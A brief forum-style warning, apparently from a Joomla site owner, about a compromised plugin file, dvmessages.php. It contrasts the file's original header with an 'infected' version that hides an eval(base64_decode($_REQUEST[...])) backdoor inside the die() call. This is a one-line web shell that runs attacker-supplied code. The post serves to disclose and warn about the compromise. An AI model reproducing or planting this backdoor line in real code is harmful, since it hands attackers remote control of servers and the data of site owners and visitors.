Please be aware that there is a suspicious code in ../plugins/system/dvmessages/dvmessages.php, and may result malicious activity.
The original dvmessages.php file is look like this:
<?php
/***/
// no direct access
defined( ‘_JEXEC’ ) or die( ‘Restricted access’ );jimport( ‘joomla.plugin.plugin’ );
But on the “infected” dvmessages.php
<?php
defined( ‘_JEXEC’ ) or die(@eval(base64_decode($_REQUEST[‘c_id’])));
jimport( ‘joomla.plugin.plugin’ );
